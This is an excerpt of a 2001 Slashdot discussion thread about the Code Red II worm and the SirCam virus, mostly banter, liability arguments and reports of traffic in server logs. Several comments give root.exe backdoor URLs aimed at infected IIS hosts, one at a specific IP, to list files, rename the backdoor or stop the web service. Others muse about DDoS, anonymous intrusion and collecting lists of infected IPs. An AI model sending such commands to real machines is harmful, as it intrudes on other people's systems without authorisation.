      Overall, it's predicated on the notion of what indicates acceptance of conditions on the web. Is someone providing a controversial service responsible for determining, beyond a shadow of a doubt, that the person requesting a service really knows what they're doing? Or is it the fault of the entity generating the request (in this case, the Code Red worm itself)? I suspect the answer's somewhere in the middle, but I have no clue on exactly where it would lie.

    16. Re:File download script by Dr.+A.+van+Code · · Score: 1
      One thing you're missing, though, is that the people who are still infected by this thing are people who aren't paying any attention to what is going on. Not watching the news and/or don't even know that they're running IIS.

      Therefore, you couldn't get in trouble for fixing their machines without their permission because they'd never even realize you had done so!

      Cheers!

      --
      Good mfences make good neighbors.
  143. Is this just the beginning? by StarTux · · Score: 1

    What worries me is if this is just the beginning in a wave of attacks.

    As everyone notices is that it is being directed against the following:

    Microsoft users using e-mail.
    Microsoft servers on the Internet.

    Sircam is annoying to say the least as that attacks lack of security on the Windows platform and the lack of knowledge of plenty of Windows users.

    Code Red mk1 and mk2 attack the lack of security on IIS (patch is available, MS patches known to cause other issues, we hear it) and then spread like wildfire.

    StarTux
    PS Microsoft is not very proffesional in its conduct IMHO. Its not all about money and power, its about providing the best possible software/service for your customers...

  144. Re:Anyone still consider this a Microsoft problem? by forgeeks · · Score: 1

    sounds great, but the problem is you would get in so much trouble for that.

    --
    -- Powered By Linux
  145. Not a bug by Mike+Schiraldi · · Score: 5, Funny

    I've always wanted to be able to telnet into my Windows box. Where can i get this virus?

    1. Re:Not a bug by Delrin · · Score: 1

      The only command that will work though is winipcfg or ipconfig for those NT ppl. ;-)

    2. Re:Not a bug by Anonymous Coward · · Score: 0

      Get Windows 2000, then you can.

    3. Re:Not a bug by Mike+Schiraldi · · Score: 1, Offtopic

      Just put your box on the net and wait.

      Oh, Windows Update is using Push technology now?

    4. Re:Not a bug by Anonymous Coward · · Score: 0

      Just put your box on the net and wait.

    5. Re:Not a bug by imipak · · Score: 2
      of course, you know you can run your standard sshd, as well as VNC (hey, why not tunnel the former out via the latter?)

      The tempation to dig some IPs from the logs and go for a wee look around at open machines is pretty intense (not that I'll be giving in, I hasten to add - bad ethics innit?) ... and it's at times like this I wish I'd gone to the effort of finding a commandline MTA for NT, though; it's a real pain manually looking up the POC & mailing them...

    6. Re:Not a bug by Anonymous Coward · · Score: 0

      only windows 2000 has a telnet server as far as I know. It barely qualilfies though, if you need to do any real work, you'll probably have to use vnc.

    7. Re:Not a bug by Anonymous Coward · · Score: 0

      To the moron who didn't get this guy's joke: Push Technology is when a server connects to your client computer and sends you updates. If you've got a windows machine, and all of a sudden it gets a telnet server out of the blue, because someone connected to it and installed new software, it looks like Windows Update used Push Technology to do it.

    8. Re:Not a bug by Umanity · · Score: 1

      Duh!

      I just downloaded a very good ssh implementation for Windows2000. Now I can ssh to a shell on the W2000 box and build my projects without having to spin-around and use that Useless GUI included with Windows2000.

      Good luck,

      --

      Michael A. Uman
      Sr Software Engineer
      softwaremagic.net

    9. Re:Not a bug by ScumBiker · · Score: 1

      Which SSH implementation did you go for? I wouldn't mind trying it myself, since the damn State^H^H^H^H^H^H^H^H my employer has standardized on M$ shit. Oh well, it pays the bills.

      BTW, I'm up to 130 CR2 hits on my name/HTTP server too. Just to stay on topic, donchaknow.

      --
      --- Think of it as evolution in action ---
    10. Re:Not a bug by ergo98 · · Score: 1

      How does sit "barely qualify"? NT 4 had a telnet server in the resource kit, and in the UNIX pack, as well as a good selection of third-party telnet servers.

      Personally I use netmeeting desktop sharing though: Works beautifully, and it lets me use graphical administration tools as well.

  146. Yup, sircam is more annoying by PsionicMan · · Score: 1

    My employer, a reasonably computer proficient person, got hit by sircam. Cost him 16 hours of productivity during a period when time was particularly valuable...

    --

    1. Re:Yup, sircam is more annoying by Malcontent · · Score: 2

      Is he still using it? The answer to that question really determines weather or not he is a dufus.

      --

      War is necrophilia.

    2. Re:Yup, sircam is more annoying by mantis71 · · Score: 1

      How proficient could this guy possibly be if sircam cost him 16 hours? I am the MIS at a small software company and it took myself and my system admin no more than 3 hours to clean every workstation and server on the entire network. I will tell you, though, that these little punks writing these things need to be dragged into the street and publicly shot.

    3. Re:Yup, sircam is more annoying by NonSequor · · Score: 2
      Is he still using it? The answer to that question really determines weather...

      That's pretty damned amazing. To think that weather can be determined by a simple yes or no question.

      --
      My only political goal is to see to it that no political party achieves its goals.
    4. Re:Yup, sircam is more annoying by Anonymous Coward · · Score: 0

      shut the fuck up you goddamn idiot.

    5. Re:Yup, sircam is more annoying by konmaskisin · · Score: 1
      I will tell you, though, that these little punks writing these things need to be dragged into the street and publicly shot

      Me oh my. And what fate would you reserve to the designers of programs that enable this silliness? It's sort of odd how Microsoft seems to get off the hook *completely* on this ...

  147. Re:Aural Feedback by bmoore · · Score: 1

    Change your 'grep XXXXXXXXXXXXXXX' to 'grep default.ida' That way, you can get all the different variants. The 'X's are used by Code Red II, not the initial one.

  148. Re:affects every email user? by gimpboy · · Score: 1

    SirCam spreads in an attached EXE

    so would this be an elf binary? if not i doubt it will run on my computer.

    --
    -- john
  149. Re:The Breaking Point by Malcontent · · Score: 2

    Don't hold your breath. You think a post critisizing MS will get modded up? On slashdot? Yea right! The MS posse will soon mod it down.

    --

    War is necrophilia.

  150. Sharp broad based CRII upsurge? by Anonymous Coward · · Score: 0
    http://www.digitalisland.net/codered/new-ips.gif

    Note the dramatic upsurge a couple hours ago.

    If they changed who provides them data, they might want to publish that fact, so one can assess the impact of that on comparisons over time.

    If they didn't, well, perhaps they have a small enough number of contributing sites that a drastic change in attack rate at a single site (as is characteristic of CRII) drastically alters their numbers. Again, perhaps they should publish how many sites are contributing, and should note if any one site is providing anomalous data. (Obviously the anomalous data may turn out to be critical early warning, but it's useful to know if a sudden aggregate change is statistically likely to be attributable to a big change at a single site or two.)

    If one or two reporting sites are NOT responsible for the upsurge, well, something seems to be afoot...

  151. Origin of Code Red? by jstockdale · · Score: 1

    Just curious about the "highly caffinated soft-drink" popular among programmers that Code Red was named after. My first guess was Coca-Cola but someone also pointed out that it could be Red Bull. I'll stay with my original guess, due to the red cans and abundance of Coke wherever I see programmers. The only question is whether it qualifies as highly caffinated. On the other hand, Red Bull has its merit as well, being, well, "Red." However, I do debate whether or not Red Bull is highly popular, since its expensive as hell, and alot of the programmers I've met couldn't afford Red Bull on their non-existant saleries Anyway ... I'd be anxious to hear what insight the slashdot community can give on this matter. *looks around table*
    damn that reminds me ... i gotta throw away some of these coke cans ;)

    --
    **AA: a bunch of mindless jerks who'll be the first against the wall when the revolution comes
    1. Re:Origin of Code Red? by jstockdale · · Score: 1

      Thanks alot guys ... never would have figured that out. In New Zealand we don't even have Mountain Dew, let alone Mountain Dew: Code Red. Just to qualify my lack of knowledge over this matter. ;) Thanks

      --
      **AA: a bunch of mindless jerks who'll be the first against the wall when the revolution comes
    2. Re:Origin of Code Red? by Yorrike · · Score: 1
      Where abouts in New Zealand do you live?! I'm venturing to say a locked shed, under a bolder, in a cave, in the South Island.

      I'm sitting here, right now, drinking a can of Moutain Dew with the following words on the label: "Bottled in the North Shore, Auckland, New Zealand".

      ...........What more can I say?

      --

      Looks can be deceiving. Or CAN they?

  152. Re:I'm sorely tempted . . . by Eric+S.+Smith · · Score: 1

    What about cable and DSL users? Unless they have static IPs (rare in my part of the world), won't they be using DHCP?

  153. Re:Bad Idea by Anonymous Coward · · Score: 0

    Thanks for the advice, Mr. McTeer.

  154. Hoax by krokodil · · Score: 1

    Try this:

    http://www.slashdot.org/scritpts/cmd.exe

  155. DDOS by Anonymous Coward · · Score: 0

    yeah, that's exactly what i was waiting for... cmd.exe and now I can deploy DDOS to any server i want - list of troopers (win boxes) ready to fuck anything i want are at my fingertips in my apache/access.log. excellent! I won't even blame chinese and M$ for eating my bandwidth...

  156. A virus that patches systems... by TheMCP · · Score: 1
    Someone whip up a worm that patches systems. Be like a cyberwar from the movies. How cool is that? :)
    How do you think viruses were invented?
  157. Re:this sucks by aechols · · Score: 1

    it doesnt have to be iis, and it doesnt have to be taking control of something. on the other hand, are you willing to bet that it cant be done? how many "secure" ms products (or not even ms products) have flaws like this that appear every once in a while when somebody stumbles across it? too many. code red is achieved within the legal range of values in the protocols involved. without raw sockets, its usually just square pegs in square holes. with raw sockets, you can go into things that cant be done legally according to protocol, so now you can stuff round, triangular, and star shaped pegs through the square hole. things will break. its like trying to run a car on water, or trying to withdraw cash from an atm with the ace of spades. the car wont start, and the atm will reject the card. yes, raw sockets are available to *nix machines, and yes its in w2k, but these things arent widespread among regular people and outside businesses.

    --
    Are you pondering what I'm pondering?
  158. Re:Ummm, no actuall by jgp · · Score: 1

    I don't care what anyone says, cooking an
    animal alive is just fucking sadistic.

  159. Re:huge cable modem hits by AlphaWolf · · Score: 0
    Apparently as of 04:30 EDT, AT&T/MediaOne is blocking port 80 inbound and outbound.

    I was trying to reach their help site, help.rr.com, and couldn't get through. Bright idea there, guys. proxy.mw.mediaone.net is running interference for now on port 8080, or I wouldn't even be able to reach Slashdot. :P

    --
    Ow! My eye! Which one? The one on the floor. ---Action Quake2 exchange, after catching 5 M4 rounds to the head.
  160. Re:Imagine? Nah... by Anonymous Coward · · Score: 0
    Too bad that leaving a message like that is illegal. My preffered method is to reques the document http://infected_ip/YOU_ARE_INFECTED_WITH_CODERED_P LEASE_PATCH_ASAP.HTML. (ignoring any spaces slashdot inserts :).

    Though this assumes that people actually realize they are running a server and look at their error logs. Most of the infected hosts I visited were a) foreign language, and b) the defualt install page.

  161. Re:Who needs Telnet by pest · · Score: 1

    well, what i'm thinking that you should actualy do is something like: /scripts/root.exe?/c+move+root.exe+c:\winnt\profil es\default\you_got_code_red_you_silly_bastard.exe

  162. Re:I'm sorely tempted . . . by Anonymous Coward · · Score: 0

    ipconfig /release will only work if they are using DHCP. You can do something like "ipconfig /release *" to release all adapters configured by DHCP, but how many of these machines are going to be set up that way? Not that many, I suspect.

  163. IIS really means... by Shingis · · Score: 1

    Insufficient Internet Security

  164. Repository of infected IP addressen by steveoc · · Score: 1

    I noticed this the other night (5th Aug Oz time), when my youngun complained about net speed. Traceroutes to west coast USA from OZ showed that traffic inside Australia was OK, but big congestions stateside (3sec hops !) Inspection of apache logs showed a new variant of the worm in action, and it has not slowed down yet. Anyway, is there a repository somewhere where we can all upload lists of (confirmed) infected IP addresses ? a quick perl script pulls them out of the apache logs. Maybe someone can know up a service where we can post IP address lists, and have these accumulate into a monster IP list. Then make the IP list available for download. What you do with it after that is up to you. This is really good - hacking made easy, I imagine that there are a lot of newbies who can get started into real hacking because of this useful new feature introduced by Microsoft. This is probably the first (and only) thing that Bill Gates has done to dramatically improve the state of the art in Computer Science. The next generation of users should be better educated because of this. Thanks Bill !

  165. Re:Apache users Create default.ida 5mb!!!! by guuyuk · · Score: 1

    Yeah, but Microsoft would just accuse us of creating viral software to attack their site. :-)

    --
    We're sorry, the phone number you have reached is imaginary. Please rotate your phone 90 degrees and try your call again
  166. How???? by Anonymous Coward · · Score: 0
    The internet is a huge place, how exactly are they supposed to find who released this worm? The only way I can think of, is make use of the fact that most of the time it scans hosts that are nearby. Use globabl collections of IDS files that are around the place, and look for the earliest incidents. The earlier you go, the closer you should be to the source. Still, your odds of success are pretty damn slim.

    Another option might be to look for braggards on IRC and pin them that way. Not good odds though.

  167. Re:Apache users Create default.ida 5mb!!!! by Anonymous Coward · · Score: 0

    Ok I'm the guy. :) I had it removed for a while because I was freaking out how many people were dl my script. But it's back online for all to enjoy and probably make a whole lot better.

  168. Quick! someone write an RFC by firewood · · Score: 1

    but what I wonder is if you could get away with creating a CGI called default.ida that attempted to automatically connect back to the client, disinfect the machine, and install a patch. It is much less dangerous since it doesn't reproduce, and you could certainly make the argument that it was only done in retaliation to someone (unwittingly) attempting to infect your computer with a virus.


    Why not redefine the protocol to where this is the correct and proper response to a codered type connection to port 80?

    1. Re:Quick! someone write an RFC by Anonymous Coward · · Score: 0

      But you're not going to get them all anyway. What about all the dumbshits that have infected machines behind firewalls?

  169. Re:The Breaking Point by Anonymous Coward · · Score: 0

    Some points of clarification for your highness:
    Both worms, Code Red, and Code Red II were written by people with much better than monkey brains. They required skill in assembly language, and knowledge of windows and IIS internals.
    Code Red II is nothing at all similar to Code Red. The only reason it is called code red II is because the binary contains the text "CodeRedII". The use of the same injection point (the ida exploit) is their only similarity.
    Code Red II does not DDoS anything, as I said, CRII is completely different from CR.

  170. Re:Bad Idea by Borogove · · Score: 1

    One of the interesting side-effects of CodeRed that hasn't been discussed is this: anyone who wants to can now hack other machines with almost complete anonymity.

    I've now got a huge list of IP addresses of badly administered machines with a known IIS backdoor. It's highly unlikely that anyone would notice my attempts to hack this machine over the background noise of CodeRed traffic flying around.

    In a sense, CodeRed provides a smoke-screen for other hacking attempts, and a 'smoke-signal' to let hackers know where infected servers are.

    --
    There has been a major scientific break-in
  171. Can we sue to neglegent webserver's owners by iconnor · · Score: 1

    After all, if they insist on running buggy software (IIS) and don't take the time to install security patches, this is negligent.

    1. There is a duty to other internet users not to waste their resource (bandwidth);
    2. There has been a breach of this duty (either running IIS or at least not installing patches); and
    3. It has caused damage (used up my valuable bandwidth and log disk space).

    I think we should all take each IIS server owner to small claims court and extract our few dollars of damages.
    That way, it would make more economical sense to run Apache. The server owners will not have to pay for the software or the legal damages that would follow.


    Sample Letter of Complaint
    Your Name
    Address
    Date
    (Name/Address)

    Dear ________________ ,
    On (specify date), an attempt was made by your server to infect or otherwise incapacitate my server. As you are responsible for your server, you have a duty to maintain it and take reasonable steps to ensure that it does not cause damage to other computers on the internet. I assert that either by running fault software, or in the alternative failing to keep security patches installed according to the manufacturer's guidelines, you have breached this duty of care. As a result, your servers caused my administrators to spend unnecessary effort diagnosing bandwidth and security issues and wasted bandwidth belonging to me. I hereby demand the sum of $200 for administrator's time and wasted bandwidth.

    Sincerely yours,
    Signature
    --Send certified mail, return receipt requested.

  172. Re:The Breaking Point by demaria · · Score: 1

    Most closed source software comes with the same disclaimer.

  173. or this may slow it down a little by Anonymous Coward · · Score: 0

    http:///c/inetpub/scripts/root.exe?/net%20stop%20' World%20Wide%20Web%20Publishing%20Service'

  174. Re:huge cable modem hits by iturbide · · Score: 2, Informative
    OK, You can use tcpdump and/or ethereal to check traffic over your interface. Be ready for rpm dependency resolution hell, but any decent distro should have all the neccessary packages. Ethereal is the damned good GUI thing sitting on top of tcpdump, and it will tell you straightaway what is going on.

    And I will now duck for all those people who will tell you you shouldn't install X on anything connected to the internet. Do a man on tcpdump to see what switch will save traffic to text-readable file.

    Enjoy

  175. Re:huge cable modem hits by rknop · · Score: 2

    Yes, I'm seeing an ungodly number of ARP requests as well, which may also be Code Red connected. (Who knows.)

    -Rob

  176. Re:The Breaking Point by Silver222 · · Score: 1
    As long as you don't author a bug that is intentionally malicious, I'm sure a jury would accept the "You get what you pay for" excuse. It would be a lot easier for Linus to defend a suit like that than it would be for Billy.

    --
    "It's not a war on drugs, it's a war on personal freedom. Keep that in mind at all times." Bill Hicks
  177. Re:The Breaking Point by Grishnakh · · Score: 1

    Open-source is a little different. It comes with a disclaimer that they're not responsible for anything that goes wrong. When you receive something for free, you can't exactly expect to hold the author liable for any problems.

    MS-ware OTOH costs a lot of money, and for that money, people should expect proper operation.

    Perhaps software creators should be all held liable, based on the cost of their software: you can sue for 100 times what you paid, for instance.

  178. Re:huge cable modem hits by markov_chain · · Score: 1
    Several hits a minute? That's a minor amount of traffic. Let's see, say 6 hits per minute, at 8 packets per TCP connection to port 80, at 125 bytes per packet. That leaves us with 1000 bytes per connection, and 6000 bytes per minute. This is 100 bytes per second, or 800 bits per second, or 0.8 Kbps. For comparison, if your cable connection is any good, you're downloading stuff at at least 1Mbps-- thousand times faster.

    I would expect the real waste of bandwidth to come not from the infection probes, but from the virus trying to send junk to target websites, such as the first Code Red did try to whitehouse.gov.

    ~

    --
    Tsunami -- You can't bring a good wave down!
  179. who's gonna post this story next ? by Anonymous Coward · · Score: 0

    Timothy 1:2
    Hemos 1:3
    Michael 1:4
    Cowboyneal 1:100000000000000

    ladies and gentlemen,
    there is still time to place your bets...

  180. Re:Securityfocus asks for IPs by Cave+Dweller · · Score: 1

    Oh, and don't forget to tack a '| uniq' there :)

  181. Re:huge cable modem hits by Anonymous Coward · · Score: 0

    Under windows98 *dies* my firewall reports something like 50 http port probes per minute (avg). The IPs logged shows that all sorts of machines are probing (isp proxys, local machines (same subnet), distant machines from all over the world). I use Noos as isp (France).

  182. Re:Who needs Telnet by Anonymous Coward · · Score: 0
    fixed. at least for now.

    /scripts/root.exe?/c+ren+root.exe+infected.dat

  183. Re:huge cable modem hits by stcanard · · Score: 1

    This is a me too -- my firewall logs are filing up with DENY's on port 80, ever since last night.

    Out of curiosity I've tried loading web pages from a number of the ip addresses in my logs and it seems that a lot of people on @home really hate us US government!

  184. link by clinko · · Score: 1, Redundant
  185. Re:I thought Sircam by catman · · Score: 1

    only hits Outlook users, not every email user? Are telling me BeMail and Kmail are vulnerable. Ok, and Pegasus.
    They cannot be infected, but they have to cope with the stream of files dumped on them by Sircam - getting several 100Kbytes daily here, worst hit was 11 Mbytes ..

  186. I thought Sircam by Anonymous Coward · · Score: 0

    only hits Outlook users, not every email user? Are telling me BeMail and Kmail are vulnerable. Ok, and Pegasus.

  187. Re:huge cable modem hits by friedmud · · Score: 1

    I too am with @Home and have been seeing large amounts of info flow into my cable modem. I am running a Masqueraded Linux box to connect my LAN to the Net - and it has been eating up all the packets - but I can't find a way to log them at all. I suspect that someone on my cable loop is probably infected with CodeRed and I am seeing all of the outgoing packets but I have no real way to tell. Does anyone know of a good way to save these packets from the bit-bucket so that we can find out who is sending them?? I really don't like the way my cable modem is flashing - it just bothers me.

  188. Who needs Telnet by Anonymous Coward · · Score: 0

    http://66.25.153.130/scripts/root.exe?/c+dir+c:\

  189. meanwhile... by TheQuantumShift · · Score: 1

    how much bandwidth has Windows wasted in the past few years...

    --

    Shift happens. Fire it up.
    1. Re:meanwhile... by Anonymous Coward · · Score: 0

      Not as much as Linux, what with everyone downloading 700 MB ISOs on a regular basis.

    2. Re:meanwhile... by Anonymous Coward · · Score: 0

      I think windows people do that too.... :-)

  190. Why do people still use Outlook? by alfredo · · Score: 1

    there are still alternatives out there, might as well get a copy before MS devours them too.

    We need to push for a Lemon law for software. I think it is time folks. MS's license ensures one cannot hold them responsible for their imcompetance, or if you read I Cringley this week, their planned mediocracy.

    --
    photosMy Photostream
    1. Re:Why do people still use Outlook? by Osty · · Score: 1

      What the hell does Outlook have to do at all wiht Code Red?

      Let's assume for a second that you were talking about Taco's reference to SirCam. Now, a couple things come to mind.

      1. It's not Microsoft's fault that users actively executed an attachment -- That's the user's own damned problem.
      2. Microsoft has done quite a bit to protect users from themselves (from popping up a warning on every attachment, to actively stripping malicious attachments in Outlook XP).
      3. Microsoft has addressed this issue in service packs for earlier versions, by actively stripping attachments and/or disallowing the execution of an attachment.
      4. While Microsoft's license does disavow them from any responsibility for your ineptitude, they do still put out hot fixes and service packs.
      5. There's no excuse for the SirCam virus, because the hf's and sp's that prevent such a thing have existed for years now.
      Please take some personal responsibility when you do something stupid (like execute an attachment), just as others should take the same responsibility when they screw up. Yelling, "There should be a law!" just makes you look like a dumb liberal that needs the government to protect him from himself.
    2. Re:Why do people still use Outlook? by Anonymous Coward · · Score: 0

      SirCam is not specifically an Outlook virus.

    3. Re:Why do people still use Outlook? by apocaliptika · · Score: 0

      fair enough, the only people I saw infected had an double digit IQ

    4. Re:Why do people still use Outlook? by alfredo · · Score: 1

      Don't you think businesses should held responsible if they sell a shoddy product?

      MS seems to push product out the door when they are "good enough", not when they are ready. We end up being the cannon fodder.

      Let's see you try to return some software to them saying it is defective.

      There is no consumer protection when it comes to software. All other industry has some standard they must achieve. What makes software exempt from consumer protection laws?

      --
      photosMy Photostream
    5. Re:Why do people still use Outlook? by BigBlockMopar · · Score: 2

      Yelling, "There should be a law!" just makes you look like a dumb liberal that needs the government to protect him from himself.

      For sure, and such a law would stifle innovation far more than Microsoft has. Imagine the liability in releasing a beta (or... gasp! an alpha) version?

      Now, I think there have to be other ways to go after Microsloth, more than legislation. What's needed is a judge - perhaps one as braindead as the one who awarded millions to the dumb woman who spilled coffee on her lap - who can be used to our advantage in a class-action lawsuit from all victims of the default-dangerous Microsoft machines in the field.

      --
      Fire and Meat. Yummy.
  191. Re:The Breaking Point by rberger · · Score: 2, Interesting
    Why not a class action suit against Microsoft? Seems that would be an appropriate action since Microsoft is now officially a monopoly, end users who are recieving the SirCam files who are not Microsoft users are one good class. ISPs who do not use Microsoft servers who's networks are being floodded by Code Red and SirCam are another good class...

    And even the clueless ones who continue to use inherently defective software such as Outlook and IIS have as much right to sue MS as people who smoked for 50 years have to sue tobacco firms...

  192. Re:The Breaking Point by NetJunkie · · Score: 2

    Sueing software makers for bugs is a "bad idea". How many open source authors are going to want to be held liable for that when they don't even get paid for their work? Not many.

  193. Re:huge cable modem hits by dj28 · · Score: 1

    No kidding. My cable modem data light blinks non-stop now. Fortunately, the router is blocking anything to port 80. But from the way data is pouring in, i would figure it to be several scans per minute to my cable modem.

  194. Sadmind/IIS unicode worm already did that by BCoates · · Score: 1

    the Sadmind/IIS unicode worm already did the copy-cmd.exe-to-the-scripts-directory thing. CodeRed uses the same vulnerability, just attaches a different payload than changing your index.html to "f--- usa!", etc.

    Kiddies were already scanning around for /scripts/root.exe and using it to set up those lovely little DoS scripts...

    --
    Benjamin Coates

    1. Re:Sadmind/IIS unicode worm already did that by sigurdur · · Score: 1
      Code Red and Sadmind/IIS does not use the same vulnerability.

      Code Red in all incarnations use a vulnerability in the Indexing Server Stuff (TM) while Sadmind/IIS used a directory traversal vulnerability. See CA-2001-19 and CA-2001-13, both at CERT/CC for more info on the vulnerabilities.

    2. Re:Sadmind/IIS unicode worm already did that by spectral · · Score: 0

      you're right. he should have said CREATES the same vulnerability. It infects via a different method, but opens the box up the exact same way.

  195. this sucks by aechols · · Score: 1, Redundant

    some grepping and word counting revealed about 606 hits as of about 5:00 CDT last night. my first attack was at Aug 3 at 23:40 CDT. i dont think the activity light on my cable modem has stopped blinking yet. each computer attempts to get to infect three times before it gives up & moves on.

    what i don't look forward to is probably an increase in this kind of crap as XP rolls out with raw socket support. (if you read GRC stuff then this is old news) script kiddies everywhere, and more attacks can be made that were previously impossible or at the least difficult to accomplish. yes its true that this started in w2k, but does everybody actually have w2k? nope. they're really gonna push XP though, unlike any of the upgrades past 95.

    then again maybe everyone does have it, seeing how many attacks i'm getting. the most aggravating thing about this is that all of the attacks just bounce off me (proudly microsoft free :) but my connection sucks now because of all the morons that didnt patch themselves up after the first time it went around.

    --
    Are you pondering what I'm pondering?
    1. Re:this sucks by wapentake · · Score: 1

      XP's raw socket support won't make things any worse. If code red wanted raw socket support, it could have included winpcap & a packet driver in the payload, and achieved raw socket capabilities. The worries about XP's raw socket support are rubbish. I daily criticize micros~1 for waiting so long to add raw socket support. It has so many uses.

    2. Re:this sucks by raju1kabir · · Score: 1
      my point about raw socket support & code red is that a similar worm could appear, one that requires the use of malformed packets to take control of the IIS server/other microsoft product

      This is getting better and better. How are you going to take control of IIS with malformed packets?

      --
      "Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
  196. Re:The Breaking Point by tbo · · Score: 1

    Didn't say it was a good idea. I just said it could happen. I'm sure MS would love it, because it would destroy Linux.

  197. Re:huge cable modem hits by Anonymous Coward · · Score: 0

    I also have an @home acount with a Linux firewall. run iptraf and take a look at the arp request I am averaging hundreds a second. with the occasional port 80 hit. in the last hour or so I have logged about 50 hits to port 80.

  198. SirCam procmail recipe by tstock · · Score: 2, Informative

    :0 B
    * > 100000
    * mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6HD o8OkQ6SD
    /dev/null

    1. Re:SirCam procmail recipe by tstock · · Score: 1

      actually, there is no space between HD and o8 on the recipe above. I blame this typo on /.

  199. Bad Idea by Sludge · · Score: 1, Redundant

    By design, it's a very bad idea to make your trojan/virus do anything too shocking.

    Ever boiled a frog? If you throw a frog in hot water, it'll jump out. If you slowly turn up the heat, it'll roast.

    This sort of violent behaviour in a virus stops it from being able to live with it's host, because it gets detected way too fast. A worm/virus/trojan that has too great a consequence on it's host will be wiped out too soon, and in the case of the worm, this means lesser propogation.

    <\Devil's advocate>

  200. zero day nirvana by LinuxHam · · Score: 1

    Think about what CRII is going to do for the zero day lists!! Hey.. how about a gnutella hack that automatically accepts uploads and shares 'em right back out??

    --
    Intelligent Life on Earth
    1. Re:zero day nirvana by Dr.+Spork · · Score: 1

      Interesting! How about recruiting zombies to act as gnutella hubs? The problem with your plan is that after the attack is detected, it will be very easy to see who actually uploaded to you (unless there's some way of masking that...).

    2. Re:zero day nirvana by LinuxHam · · Score: 1

      how about this gnutella hack having built-in support for tcp bounces.. servers will find IPs of other servers in their logs.. the bounce servers won't log bounce traffic.. it'll be just like how NAT works today..

      hey I got it.. the gnutella peers find themselves based on detected probes!! they don't even have to look for each other.. they automatically announce!

      now if we could just select a port and community string..

      --
      Intelligent Life on Earth
  201. News.com coverage ? by Anonymous Coward · · Score: 0

    I'm surprised that there is still nothing on .

    Last update on code red and sircam frenetically avoided to the word 'microsoft' (/internet/ worm, /e-mail/ virus). Wonder what the MS PR spin will be on then next one...

    1. Re:News.com coverage ? by Anonymous Coward · · Score: 0

      Wait until tomorrow. Their NewsDrones don't work on the weekends.

  202. You missed a link, Taco. by Anonymous Coward · · Score: 0

    ....this one.

  203. Imagine? Nah... by tsmit · · Score: 1


    I have to live with it being on the biggest "script kiddie" network on earth (ATT Broadband). I'm getting approximately 3000 HTTP port probes against my machine an hour (without a webserver). If i reboot my windows machine, it takes me 30 minutes to get a DHCP address due to the fact that the DHCP server is hosed.

    DoS attack against the Whitehouse? I don't think so, how about a DoS attack against everyone? I can't even get to servers in Italy.

    --
    Yes, my girlfriend is a BitchX
  204. huge cable modem hits by rknop · · Score: 3, Redundant

    I've got a cable modem on nash1.tn.home.com, and my iptables log is seeing a huge number of hits (we're talking an average of several a minute, more or less) to port 80. Since I'm not actually running a web server, I don't have the logs that tell me if this is in fact Code Red, but I suspect that's what a huge amount of this activity is.

    It's depressing, really.

    -Rob

    1. Re:huge cable modem hits by dozing · · Score: 1

      Now consider that the bandwidth for cable modems is shared among all the users on the same loop and multiply that 0.8Kbps you speak of times all the people on that loop. It still might not be huge but it is significant.

      --
      Dozings.com -- Its kinda funny... If you're as crazy as me.
    2. Re:huge cable modem hits by Anonymous Coward · · Score: 0

      I too am on nash1.tn.home.com at home but no web server running anymore since busted by the @home police after two years. So now, personal stuff runs off my linux box at office via dsl.net. Beginning Saturday, two linux apache installs running in Nashville off dsl.net connection started showing about 3-4 per hour hits from codered I and codered II.

    3. Re:huge cable modem hits by IronChef · · Score: 2


      You aren't even supposed to send email to your job from an @home account. (no joke, tech support is adamant about that.) They have an @work package if you need to do business stuff.

      In typical @home fashion, the upgrade to @work isn't available to all @home subscribers, because it is a DSL service, not cable modem... the coverage doesn't overlap 100%.

      I'll keep violating the @home TOS quite happily, so long as they are dense enough to let me.

    4. Re:huge cable modem hits by friedmud · · Score: 1

      TCPDump is working just fine - seems like a huge number of "arp who-has" commands are streaming in.

      I don't think whatever is looking for these addresses is being very successfull - I haven't been able to contact any of the ips it is looking for - seems to be very inefficient.

      Thanks for the heads up about ethereal but I don't have a monitor/keyboard/mouse connected to my router at all - just a lonely box in the corner :)

      -Fried

    5. Re:huge cable modem hits by modecx · · Score: 1

      If it has enuf disc space, install the X libraries, and Ethereal, and operate all your fun X stuff over ssh tunnel. As easy as that.

      --
      Constitutional rights may be respected, repealed, or modified; but they must never be ignored.
    6. Re:huge cable modem hits by Croaker · · Score: 2
      No kidding. My cable modem data light blinks non-stop now.

      Mine too. I'm on AT&T Broadband/Road Runner/Whatever the hell they are calling themselves now.

      I have a website up, so Apache is logging all hits on the site... it seems the access_log is only logging one attempt to access the site per infected host... the error_log indicates that the worm is actually hitting the site three times in quick succession (I think over a period of minutes). The only thing is, neither log really accounts for all the traffic that appears at the modem. Everything else is being blocked by the router/firewall appliance, which doesn't have great logging capabilities.

      It looks like Red Alert recently hit a motherload of AT&T broadband sites, since I am seeing mostly sites hitting me that trace back to AT&T. Like another poster mentioned, you're not supposed to be running servers (so... sshh! I'm not running anything ;). I'm willing to bet a good number of people have an install of Windows 2000 or NT up with IIS installed and running by default. I bet most don't even know they are running a web server, much less that it's been infected. The few sites I tried to access that appear in my log all have the default "this page not available" thing, which is what I think IIS coughs up if you've not made some directory the server root.

      I suspect one thing is that the DSL and cable companies may be prompted to crack down on servers hosted on their network. I mean, if they really wanted to enforce the ban, they can just do a sweep of their network and tell you to know it off or they will pull the plug. I wonder if they will actually start doing this.

    7. Re:huge cable modem hits by iturbide · · Score: 1

      Pah. Just run it on vnc, that'll work fine. Just do a search on vnc at freshmeat.net and you'll find what you need to run X apps on your server.
      There are other X-servers (actually technically a bit of a different thing) out there, too. Some of them cost money.

    8. Re:huge cable modem hits by Saint+Aardvark · · Score: 1

      I'm on ADSL, Telus in Vancouver. It's the Code Red Monty Python skit: "Arp, arp, arp, arp, arp, arp, arp, arp...."

    9. Re:huge cable modem hits by interiot · · Score: 2
      I mean, if they really wanted to enforce the ban, they can just do a sweep of their network and tell you to know it off or they will pull the plug.

      They don't even have to go to that great of an effort. All they need to do is have their routers check a single bit in the TCP header to see if it's an incoming SYN packet, and ignore all of those.

      I assume they haven't done this because it would piss off ICQ users and such. And I think they really mean "no bandwidth hogging servers".

      But they could easily block incoming SYN packets on specific ports (in fact, they have the ability to do this, they're doing it for a very limited number of ports (netbios)). I assume thir unwritten policy is to be nice, but they want to have a legal safety net there for when they want to start swinging their axes. Kind of strange, I think.

    10. Re:huge cable modem hits by ogre2112 · · Score: 1

      I'm running a webserver, and I just checked my logs...

